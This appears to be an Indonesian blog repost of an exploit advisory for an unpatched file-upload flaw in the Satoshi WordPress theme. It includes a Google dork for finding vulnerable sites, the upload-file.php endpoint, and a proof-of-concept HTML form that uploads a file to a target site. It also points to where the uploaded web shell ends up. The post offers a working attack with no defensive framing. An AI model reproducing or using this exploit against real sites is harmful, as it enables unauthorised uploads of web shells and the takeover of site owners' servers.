Halaman

Satoshi Theme - File Upload CSRF

Sabtu, 26 Desember 2015


#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352
Miscellaneous

Submitter Anonymous
Views 750
Verified No
WPVDB ID 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Succes  : Succes

Shell Path : Here

Tidak ada komentar:

Posting Komentar